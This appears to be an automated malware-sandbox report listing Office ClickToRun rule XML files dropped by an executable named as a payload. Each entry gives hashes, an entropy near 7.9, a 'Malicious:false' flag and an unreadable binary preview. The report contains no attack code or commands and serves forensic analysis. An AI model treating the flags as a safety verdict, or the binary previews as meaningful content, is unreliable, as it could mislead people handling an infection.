                                                                                                                          Preview:.<?!.u*...;......i.]............y..U2.j.B......s.6.J.DO..#K..~.>.`..A.yeb...2.m.~Jb.&..U.l..).n.j_...a.'.._.0|..6.V..# 4.R...o.w.{..}0.W.....^Q+.,>!._%..].....d+...g.S.MN........9t....H_f'...6.....N..-.m ...;.,...a,..Ezx4zBFo.Y.A. ....f...E..(`....KA=q.....>w........S@...].nG.@..............w..Y.5....L.M....=..T...J^...@.z.8...5..].w0(\C@.x.z>>.......X....e.XnW.'...._.e!.3yAQr.|`..z.s+"*~.......c..%...^.THU.".&.(.......?.f...hx.du.5.....CC.$*y.P...&...v......gt..}.}..4r..*>>...._..9'Ohi+...Oy.+a.....U...W6gQ...^.y.......x.r......7.._r...3.n%...38..=.....$.o.(Mz.9c......|...;4.{.qK\..@.AUWr......%._....1R......._-.|..,.b|6...#.u.I9eC..\..i4..-4.......7....D4r$..I..Y.hq.\$.....6....s.......l#D..9.....q.[.)..c..W.../........%...yJ.....-.....*....'......a.Nfo.Y.q.9...w...'..5.i...c.p?..{...;.r._h..gon#-.V......t!.g~..E;......{r.D./....w".2...}lk...L.X..1......."..5..|O.?.N..u...8.....+p......}.b..I5#6.|4X..;N...I6..CL.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702750v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1700
                                                                                                                          Entropy (8bit):7.901948652065039
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:tCn2GHwbHw5wayFJRllSFAPO5sG/OlR2zL9+5mcQ7A208ctcYzzYiJ9w4YS4qiuX:wnkjs/yn5CAPO5zOlY8mlv01aY3mjXMD
                                                                                                                          MD5:E4E761AB506700980A83F1BABE5E93E2
                                                                                                                          SHA1:5024E387750391378F94EA65F1C0EFE7C9BF8E03
                                                                                                                          SHA-256:6CB62F656A21596B7CC5F8715B8AE001FDE8899B5C8D3AF33059BF9049AF9E7C
                                                                                                                          SHA-512:B9D6A71BB672D6E6C2BC17FB77CB975D1D811495823F6B317EE2DAA164696A1EFC8FA51679816423DFF25DEE08B7F77355333A5531AABBDFD08AC2620E847479
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?%...v..)....E(2cF....z:H2.._...F.5"F%bi.U.F..F.......)8.=e...h/.X{.D...Z...\.6...!.L%.)..S".;.Y .e.Y+.;\.....:.e..?N.Sw.].....-Cl.p.,.t.........E.).......e.,.U..IrlN].D...G.m..t0..;.....%1.v v..fD.=...G.<.m....q`T..D.a.h.Z..f..2.LOzaQ.S.v..2...^at........w..=6.G....m(........DI'y.....l..H).6....v}~.Ag[>..|.w...FB<-.fU ..Ri.../)..L.DI.)...}C,...V(.>Ux.n..W.e..i.\r\.k...ng.P...[f.6P6.FE&S.f...........,_..B..T....W....R..u...K........FL.jS-.L.-...?i4v.{.....].+..-.......=......]...^/...(..e.M(........<.K^.y...*.T._.P...u)<..0."..M.D.....O.Kh.I......Q...1..Q........4.....i.T........%.p.V.q...X...v..oG.qI.^*....#.ho4..1...7..>..}......"%.W..X..$H..K1`....,.../..r.xy..S..!...~...\.N...........:.{..X.ON+<.Z.........x~a.}......%<.j.[.[.....q....f....Kx.m...z..z.8...s..).eSZT*0l.....0...+]I..?..\z"Q/6}Sd2.S..p9....@..5C,.,.a@!........Z~.^.j.........I...8..}.os....+J+..97~;.b..pD...O.A.....bvl:^...CNB.....G..jY..mf.e..z.:.....!jU..U..c.ZF...@

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702751v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1737
                                                                                                                          Entropy (8bit):7.90838830320524
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9KAJoGG/M1wlYhN9luRl8SSe/tS7yqwX8vybFjRsR+b6A1ZUidlCzRJNZ07TbD:9pJUWfhvlOielCFwDd6Rm/7U2l8Z07HD
                                                                                                                          MD5:D4C8DD177145401F22B8315A6FE0F3EC
                                                                                                                          SHA1:A6EDFE7B7124265DEB113E0BE477B6059F3F5915
                                                                                                                          SHA-256:73B065B42D7B8C7AAF65832CA90874A53B3D30CDAD98AF63BD4BD2645FBE679F
                                                                                                                          SHA-512:DFCA76D0DC5C2CFFCB1B99D429E6263F6193B6A85EE55A06E217BC1AF56863FA7AB6C48FEFC35471CCCC27F61D78AEE3B552182F673BEC0218A33C76D49FD915
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..Fd....v.{..f...xG.z.. ...R.FN.....&...Qf.... .....F66.....7...Vu....op..C...,c....:{s......y.O.#.=M.ehwK...x.)...t.-..uv.I....=..|..l..![t.._..s...+....X.....A....q}I0.O.7h.+.O.......z..i%.>#B]R^...{.N..<!.(.....o(.2....?#.{i..x..N3..n.*..Ti.,......i..F...P.V>.T.Eo...9.....[...G.V...n....wVt.W......:t..j+.[j..:.rh..\~.(....K.F.T...0..+z.].#..d......1..O].W..@.......8K\c..f&..3>.F...j...G.G...S|-+.v..Yb4.@..=o.5._..|...E.H......;..T.'.0..'c...4H}%.`.........Z0MM.a....b.2z)....~....X.z..U.1,Z3.7.....9(88....u...T..{.;.]..o...f.d....9.........=..sp3..3.`..1.....k..O....k.S`.....S.(.[.....r#...K...X....?:..}j..x.....\......Gt.}$...E/...d..n_.......`....q.^...6b@....=>7e...z.uGG.1.Wz]g.Tx..*{.m....z.5.oL.<(....C.+..r.....i..!.\5FD.......5dQ/..0p2:.`_...mV...$`....t.2.y8.vj....A......u .._R$`@.............^.P....$.P.,...zt.z..6...1..C.m....^...Wz........[[.V.ST".u..m......r.a.......)<.......Pu.].0.?.:./..-...P|.....==/..g}.."l..._.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702800v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1688
                                                                                                                          Entropy (8bit):7.869066540067051
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:UGSq0cA1OjRAzL44ahLu7ccTwm8/n3iBdDXoxWNZ/uJ/YCWqP8J4MUDWP2Y/bD:b0c7td4muIcTwf3whXooUgCWlPUojD
                                                                                                                          MD5:BABC0EC2918EF628390F02A0464BDBF0
                                                                                                                          SHA1:DCED4A29844602E3980383EB8A689302EC9BB90B
                                                                                                                          SHA-256:392DCF597BD6F506970D4B2D2F96D331CB69A85315EE697CF71A79D6DBD9B5A6
                                                                                                                          SHA-512:F29093C8D21E9449103D4AC34D96F87B146253886035C47C2E33581F123FA7BFFFE43E966472C5CA2AC712858EE38F04FFBEF485EC1F91BE5CBD77820A6D5F36
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..!Y<.4....Lf6[......f.v.*.3ev....@P...HIs..X..~o[..."s.Fc.>.2.?.u....;K'....5..e?'%...Z... ..s.Mk.&h....c..3.....u.../..g@TO._...w.!k....J..X.X8l|.L....g...+p.....}.P....Xu.^....xb_.P._.8....sM.Z1.l...dK.....9UB%...et..a.E.2...W.;/...1.T....~:..&t%....L...,..o6 ..9(..2W|.......A...FT.7..1..|VK.{|.^.....,..yK.Z.L......f..f....SJ.._.....!.1)..an.n.e... [..A..Tr... ..=O..C.N.6}f]]..-..0RX._s."....2....2.;.r..+n_j(... ......k.[.\..._.<K........\;.o"..YT."Y.L.....e.....n...J..X..E.....G...l....l....d......%.g]Gv...e......^...~...y..=P9..;...s.*{.d{....+$..$m..R!.'..8g......?.....D2f.c...'n......w.7....w....(.%.E(1.).._w.F.J..%J^J.M?.......k..Aa....#..,....5....E......Vu...T.....7...O&$.l......U....j7..."f.J....3.....a..}[.Z..r.+8..9.Q.<..q..n........I.2..,A...3)..m..>.....G.....,...].!Ng&I.(x.P..O..m*.>e...)......'.......0....<..1...u...u.Z...V.5j.W..EE~.n....&..1X...n...+B..a}...@...q.g......v*Hn..b/h.H.._t.||.`..'...%........D+.Pni.B.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702801v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1725
                                                                                                                          Entropy (8bit):7.885790287373318
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:bQTIHOJ/cVLD/urKsBL4RF0FN6wzSsyUG0GwiD:bQcq8TnsBO0ycSshG0Gwq
                                                                                                                          MD5:32295E2C1F2A43BA1ABF7AC7F8D8F708
                                                                                                                          SHA1:D7821391CFF7324BE7DC511AB2E4A41CAD9901CE
                                                                                                                          SHA-256:FD1C927FFF4600A0597C0A78A6DF8A7EA2D3FB91DEA2F2F7D0B2946AE1C64AB4
                                                                                                                          SHA-512:CF2147C762266BAE7601371A55C12474A6520652583F8E95ECE371135AC8F341DB8634415053855BAA060F994190B863CCE89B43A59813642569A37AC1D51F42
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?[..O<.Z>...K2[.....J........4...#...^.>q....#..,.6 ...?vs*..at.`.u"/H+E.D.&.k.I......P..&..*..& ......2.m.6...E`^mW....:.W%...hS..7....>6...`..z..*`...=...I..9..Ln>...A..}F..<.w.@.C..%.r@.2..Z..K...@.a......,..N..+.5..@$M......|.;..0.}....Pv..:.;=r.L.N.&z|......q`.......Pz...f..h.MB=....z..CX%.H........|k.....E.#.l....X.... ..VT.d......w..$1.Hj....lb%(........?nM.X/.8W.._.3>......Ao{v...~..g......}.....=V...B8V..;m#tD.h....C].V$.B....2.......`....<......UEf\...[.v.@.7e.&.Q.....|.|...@.....O..x.58..#3..(....M}...+Z....G.\>>\.....5...D.g..bS.C^R..|#.$..EE=..S.6[v..D`...S...].x.+\;_....)z..\...&.=...J4.%..@...M..4.(oav...=.E{..u......8/..a.....Jbf......D.S..^+.....'..2...+.."...f.O....c.}(.Bh....v..Q<.=SySS.k*.!...KG....P...[..4.....1....I4u..u.V..../l.DW.qO...s....:....E@a..,5...{@...Yqjq.[e.S..3..TI.-.v...9le..v..l]..`;....-.S.W..5.T...#..01'r..W.....v-...C..7C..TH.|..Nb..]..0..Z.p......x.A.oc?2s.P.C..p@H.C...%.?...........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702850v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1702
                                                                                                                          Entropy (8bit):7.88691314194788
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:nZ/y5QzrreQuRIVlIPYEwivRhIC8DZDjiewTr3bSINekcbwDmKbD:nZ6SngG+Pj1pJ8VWOfumoD
                                                                                                                          MD5:3718BFCFA882A6400AA139ECC0E2423B
                                                                                                                          SHA1:5B80094458E863422BCE8638F353812A5F860CA2
                                                                                                                          SHA-256:721FD3E8C19B52A58A3EA89752032587ADD44E99853017E0C9B28478C1F3E96B
                                                                                                                          SHA-512:34850B1B5CFA93C5878F8899C9DE604312E76F182051D53FCA7EFAFCDA122137A3A7EDBECDD3D9EFD421D909EDA7743B9557F8BD7A4DE1B8A2AC3CFD7B33F41F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?#..{O......O2.P...rq.K..C...4Ih%s..#t..@.E......" ..C..3._..Ux..C.S...j.}...O......0P.b<..+..l=...}......0...}.h.mg.....D...R.._...F]...R?.(.\..%..s5.W...!..6m.G...R..;.. ...i..Y?'..X..B.;u.0.xc.........~..".........yU.%.=dF.Y.G....&D..x-_..t.s.85..V.%.7.b....{a..t...J:.b:..Y.....j..X.3...a.Y...M.bYJs..m...k,M.s.P....1.3(....i.... ...26..c^..L........n.#.^A..P@bD.....3..(.HY..2,.!Dt>p\.......x.......a.+B d.Y.%..fBMLM........zn.~.9...j....IO.. ..^....~4.....o~t......3..D..mh.+...s.$M{..z.V}B(.N..]e.... .a...57.[.Y..{.)z.y2.a...........2....f...@....C..7...#+..plJ}"~Td.S.....r....8.sV.1..r|."e..C:A..8....ey.J$.Y............<1.c|;..0M0u.!>y.....6.(...#..m.C.Y.....l...^..=.."..|..e.S...-.@..7H...#......U,.......A..iNu..d.%..._..65.xf.I:.,Z.qg....J.......E........v<........s....._..d..F.#...'~4....{.1.....#$c....%v..0.....[..w.....b.P2...].\....1.|.@.,....p..}....A..>.....p.GasQ*..........._5b......|g...k.}.w\......i.....1..Ts......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702851v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1739
                                                                                                                          Entropy (8bit):7.884001497749741
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:CPvDSXzschYgqqvW/PDbxW9CwOHxKNvO9HD:CnDelhYg2HD9WUVKVO9j
                                                                                                                          MD5:77886CD75F3232AA87F995EF47EF7EE1
                                                                                                                          SHA1:1B8DFC86EC2DD07908BAEF9A1D30A8B9AEC09CF8
                                                                                                                          SHA-256:5C896486730EFDFD29B0E1DFC31806A5C2748582F05555069B02C39070509382
                                                                                                                          SHA-512:584223500A5AE2CA1FEDB9019B53B2DF96DFA68E8EB2137AE578EDC10A5A11ED8BD39B13F6610ED1FE4117F5F211747DF9A4A8BC82BA893F7B3FD0269F21E43C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?{.qd.vIL..N...E....H..z......a.S..(..!.~.#>.~.p~..j.......E.T..=0..K......$.[&fx|..d....p.@...N.0.".P.M..KX..(..g.....T.mI.Q......x..9..c..M..|O.t../.vd.4w.../2<%...\....!H.9..$..q.7.Y.;%q.M..'.6..rY...M..5...Fld%....$........k..".S.f..R4O@r..5..<|<...'qy.!iBf.....i..a.M.(Y..N.I......ab..1.......Q...y.X.6..1..b..$f.....".u..G1.l..Q....Q...v.4.5.o.R..XH_{...Q.....85..C..V...F..-....H!.Sf...C.6_&L,.+.~A......s.[.+...O..C..k..o~6..V....m..Y...]..l.......m.A....Bw......5.%........2.{..2.A.IB.g..+.o...&.b....4..w.A.....T..8..Be..}....y.+.;.E;.^NMu...L.\.._.p_H.......Q....x_.......~._...j.F^..T..b...BS.9X>d1=......QZ..#.;...EZU..h.t..f.....!.....8.CX|A...Ola...Xj.*}......C=..[..WY/....m5tQ.......?.L..1.G;*E.Md..)ca.....N........E.2iq>$,.c...S.w.!.W...].^.Bs.F../E^y..:....g?.w.\... .....`.34k..... 4g.W<55^..^.}.....p..}..T....b5.15......J............g.i.).|.w..=\]@ i?....._F..[U..Z.uw.Y.9.0....68)...9."e.(f.\.../..."z........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702900v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1708
                                                                                                                          Entropy (8bit):7.888077188614385
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Pe6RPS7vexyb2eQhCkNfoYOf5tRSMoXBYOPoalUOXtpKH9Ow5D:sjbUO5oXSaXlZCHEwx
                                                                                                                          MD5:FEFCE8D0DF78DA057C14DA54C1539836
                                                                                                                          SHA1:073F4D8BDA5750BA0577EC37DBCEBC9BA424DB08
                                                                                                                          SHA-256:B09613F22DA2786A79A419DAF4BC21BEC4A13DCC708C435574F4DB463E763859
                                                                                                                          SHA-512:765BC13FE7E56376EA6156241C8F91EBD214BC590DBD9CFB19F8DCE911C7A04DB63A25D9982209EA6EAF2D6C4B9C1E0180A656CE751B84D60CD151A84CEDA23F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?...L.~.e.r:.G3.o&...DQ/.H.....h .T@...d..ey..K.Pux..2V..C~e.....a....#.r..8.ip.7>.#...(.52.@}.....Tr..P......?a.i$..{..S...6.Vr@p.m..Tq...2P2`.Q.......Q..^..1.j.e1......'..^..+..[.(-`U..i.....90~Y.HR.<(yw..@...)Q...s....g...kb...LbmA..Y...K......8..8 .N....{...P.i.......`@.5..H.j..z...3..w.u....5.W..K..t...3[.p.\....K.........!?.h(.....J7..S....7..A...qW\Tv....R...9...1..%...s.cw" ..^.T`....8...Q...j..9k.+..5.f"r^Wr.>a...5M-.j.Isn .?...A.gJ.|.>...b.7S.o.a..3dm..gC.P.Q..6.. 4...9<.<.xYG...Uq..0.}..N...A..?..O.G..b.....=;c.q.....]O^$U.s....".0.x......cy...0.3[....(...../.[.x........>....b...V..><.k...E.a,.&.Ou!...^...*.....p.}....|.Y.....h..z.F.}.&!4..@9...t%...AL+..Y.."..}.=.%$.^4I.uR..k.E.P.u.qd|@)p....F......C.u...#tn..z...>....Z...........V.z..P.........m..d....#7Z....'.7..<..3.X..Q..Zf6u.....m..... ....).-..%.|.W....jS."_y.@..h....*.~..i/.r.2J9....b..w.8<..=<....=..7.2.x..1H.`C.]v.0...m.F..TU...)...4..GW....g...f....,G.....Q.n8..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702901v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1745
                                                                                                                          Entropy (8bit):7.889343131378465
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:O9krTsCFyvTYQoK9AcitlLZjXamrMu1kXQTS9InG93sNrh8xWjwSbvQIPjSJrzWX:5ArxkFtrMAcIGJpxxc8sD
                                                                                                                          MD5:6AE07F4D9984C98CF0E0E39836E552E7
                                                                                                                          SHA1:1D3BA42FE73588D18B324A071F544F77F68674F7
                                                                                                                          SHA-256:44A7E3F008F27210469C030C858D5A3484A1FB8E8B61FCDA13C9DB538A0DF693
                                                                                                                          SHA-512:509054974ADB88EB6CAD67CC2529859ADBAE67FFB7FE8F3582D1AEA64B79A7712AE4403C35B93E4F13C4E9DA1EE8704E0EEBFCA532F1FF629C33DC8AFC624D4F
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.v..b.mQ......>#...._..U?x...%....O..0..B.we^& q...............F<...M.N] >:..>".....EMW..E.^t...... ...)...:.\{..../6.Z...]f.Q..;.m],.f.....=+..U...........8.....*.j.......6.....4w.V.....q%.j.X......v......P.1l..)...+...,]r..dRJ.. .(...PQt&J.8ca....q.M..B........r3.Z9c2...ZT.0{.aN....1..n.o..........<.e.Q4.k>(.(`y.,VS.7...\T.q..]..w..1....6...z..W.Cp..1x8R.o....u...6......n0..3..pHBK.4.4..T.+._.WH...)...X............17.5[o.U.5@`N.h.tT........8w.;:.N.llp.*J..d..#.......F...6.3.b...[hse.x$.~....\.pVg..*'...x?X.\?.5.0Sgg.'..3.K..H:........])M..J......s{..*.....b3.X..6..rg.Z.f.q......@.TS6x........-.....Z.C..,./...B."...O^.........J.p...4..C,h..duR.P..A..JE2....!..[.CN...?&.....n..6..^.......2.....i......"#..V.....o.#<W.KB....g-b...=\..l....u&......./...L.[.*...C..%.z.~.."[......S...U.s..hp'.sw.....$pdb..S...}...7.....9....iY.1QG\.u...|...>..X.^.a.&E-.mC....K..c.?F.C'...a'=.).b.....zY.._...-...~..+.t1..%U...{....A9...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702950v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1702
                                                                                                                          Entropy (8bit):7.878655744619837
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:K8OZf7zRKAJQbCp+d9iqVX+AmL5S3p6tHOlgPHhD:4ZfVJipd9bYAmkg9PHJ
                                                                                                                          MD5:5D9129CF45310814D9AF81240AF78F45
                                                                                                                          SHA1:47F8054FF0E7333408763EA5AAF214EDB503EDC4
                                                                                                                          SHA-256:097C3D94C95A26EEF6BD97D0E61E7D1A52696862C1A6315D669388DB92FE4D60
                                                                                                                          SHA-512:BF303E631AC808FAF0F2EC1F87F2C3EAC4078D0F065C7A3AF17ED6038375FE2FB86007A48516458A8286DC24EE038EF16FA2E20F042C03CD9584DB51FD44690A
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?c;..Z.[h0..'.'V..!c.s...3k.....D.(.H.......6....#.s=q.9PP.~...{'..F.........8.e.Yl:.(.*r...'s.P.._.$.......:D..Wz...V..w.+...1..{p.2z.&ix.o].Q.6.b.M}...b..1.t..I]t-.^w..B5N.E3...>.cz..}......#.a.E..@.+`\J...^Q.......K...q..z..,M..~....`.).C..%>...I5.E~=..gp...,....<..2K.>..rn....*.Ye@..5.....c.. ..F...v...T$K.../T...j......7...|....g.$|.S.6..@...\.u.'e......4.....$r/..T..N.F...].$...%.y..oqK.?.k.u...[_...]9p.k..wN\k.(.;.+?j.d=..R.;H..f?'!P}.w.....A..8..[..v..,...%.].\..W...KW..]..8d2B,..x.i...e...].A..eA....;.=<2....V'Fh}{.....K.........6..........A@..sy...Bdb=.h.Z..(+.L..0*..... ..:...S.../O....*Q.I.{.. ..m.;...Ih.&....7d......l.R#.P..U.#.$.K./..Kj..g..z.7.#>.L....o..`.{...q,......|..*.GZ...ZIS.G.p.....I*ID..|.Tz.M.....ti.'C.._N7..tr0..i1.9...z_.<y...N.;+e...8.....k......../S.NPY8.._yy.F..n.[.w.u...s<.......O..6.}:....i....6...D.*.p...`...).....Wl.#.<|Q....Q.@..u...D...wC..2..m;E...#...G...|..J7E.S.r=.C.I...X.............nZ..=B.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702951v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1739
                                                                                                                          Entropy (8bit):7.89217177312047
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:kpnnvK6nGhjnAyjFXucmMQkqWG8ZcWjy8rVetcvnD:WvK6GhLhJXY4/rUYD
                                                                                                                          MD5:F222586DA84F2B33C425A67EADE0C762
                                                                                                                          SHA1:F45FB9963D5B9CB1FCC7F8C5643B5C8DD8446047
                                                                                                                          SHA-256:5727B800AD0E6493B32A53F5FBEBBF6775C8559CDEFEC2E450FF3178A1F6F69E
                                                                                                                          SHA-512:1B46CCD338EA322B061593BEE5B034BC7CA783232752CB9CAF122208B9B3E59358829E76439F6291DA1C65A8FB215AF7ADEB0DA603E40E806654CD17BCED8A66
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?.\...G1Nbys......7).,..e..-..r.g..7......._...y.r..d...AoEeA%...;.4&K^..D........PG...w.;T....H.=n`...);..p.....57=.g~.Y+.~.$.cx..3ch.@..*9.\.4..=..Sr.).(.$..#s..xX..'..2.B&......8Q.})....x...G?..q....%F.>.M;.UW........._Y..1/A(W5...y ....5......B..S~.G.wll...'.._?.MX..2.:>5S.$N[u-.......Z.......6.l.&1.../~[.t....A.`.U/U...t....EJT.O.$.W......m.)4... &.v(v.%..Z.=..z..k..........7h&..E...:w.?......=q."..-...3.|..f.O........V.,.].".9...g..i..A..MDZy^`%?......=rj..s.....b\.rp..,..*\..=.`WG....7..-..T..g.zm.^..0./.vX...*..p...l.h..a...y........".~....(.....:"<..9......%-....W....SGpU...P%.'W.V;'.2[......J\...L...~.]..<...o....lM.}.M.-.... ]'..p...R$X..<.-+.e...5.....G.Y....(...[.R......o...mXtMj....ch^?.&...&..{..XD.s..D...h....y...`..Q.z..`.......0.ZI.l-U.a.P.(...J..r.5.....F..J:.]$..2#!.U.B*.....j.7:Y....3kL^.....+:..B...'9H.p]..G..Ro.`..P...........c.Yl....;Z&..G....6.l..2W9?.(.,<...".8..#.x....g.;.....-.....\.R)..jBCR...o.da

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703000v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1703
                                                                                                                          Entropy (8bit):7.89378903842487
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:d1mHGnMkzmRlpM/Z91eTUm/lHGdqLKgpuXGFD:iHGtLv1enVGdqLKgc29
                                                                                                                          MD5:CD6445310B77606E1802EA070B764CDA
                                                                                                                          SHA1:74D4663FF5AACF77F69DF03A5309B2057734E762
                                                                                                                          SHA-256:5748485B9256E58BF190828AC3231E3A8522C3989E81C58D6F374F3542BD4764
                                                                                                                          SHA-512:8FFDC8316C1ACAA023D3D56A03200A4FAD8D6C8B48CD5630A656A78755FCB6E5B6101CD2445D58D597DDB015F42BE2BC1F176D6900795617AD069FF8A49C7A8B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.<?..\.e,...j...!...G...3....[Q.._.O/..Ks ..9:.B.q.$...82z..fJI.Y4.$=.N.4...k3.1../#.X........~.....f?......?..5...-U$Uy..@..`5..........|...E.n...^4..'E..B.g..b.I.u......a.J....~...lA.X.....*...N...=v...p.........f.;u........o?H.r..9K:v.....).zx..'......+....=T....>9.5.b)..Rl.n....'..]..W....I.*.'p..'...;@>.&.....O9..JA.\P..H.6|..i...o....s..v..h....u..U..]..g".GmQ.A..)J.L..mM$l..@VQB.......-P....w.3..wa...<..et....P...O,.X....?...:.:...<5.B.;.........'..+...cw.........}..{..B.LI.Q.mT.Y...W.h.V.o.vg..8.X%.9%$'..W.@""....t......U.bx.....F..&!|.Rx..iY@m.k.z......qZ4 ....e.#.LB.c..NSd..P....X.A..S..6.aH.y..u..Ce.hj.a.........8$.+."/X.Ek..'xR.@.w..._d^a..1.+.k....YL.F:;|.-...`y;..5t......M..:.._A*._T...?.5.5...g.[.....=.(z.b........+...fl....j./J...I.&..;EA`....q.\...Y...E.@)...D,.P.. ..!.dZ$..,.....$.nU..{Y...h..d....Q..y...R....w.............3/..g.+...=..../..x...).1.uZ....pG&.....t0.....*7...u.@J.W....-..(...S.HO......:.nJV......W.s

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703001v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1740
                                                                                                                          Entropy (8bit):7.889935812933853
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DelpwcoQxQkoR7Ltxlr153c56WxOJUkyaNYQ9YKpW1bXQyD:DUpgAba3f53c5XiSKMga
                                                                                                                          MD5:D5E4303E03882FD4F7E8A3A07056F64E
                                                                                                                          SHA1:5895A083B3FDD24491FCEF65BA578BB32C947C14
                                                                                                                          SHA-256:6AA78294E24CDE47E21E7A42EBAC88FF3C9732B7EBCACB1DCD4192D9503F947A
                                                                                                                          SHA-512:C5406E8D82A334F3BCD1AB2ED12685F052FAB0D017062B905AD5FC3860E9BDBE0C947CF997A327807C7848793EF52FBB8B1872B96D163EAF299DC93C8469C30F
                                                                                                                          Malicious:false
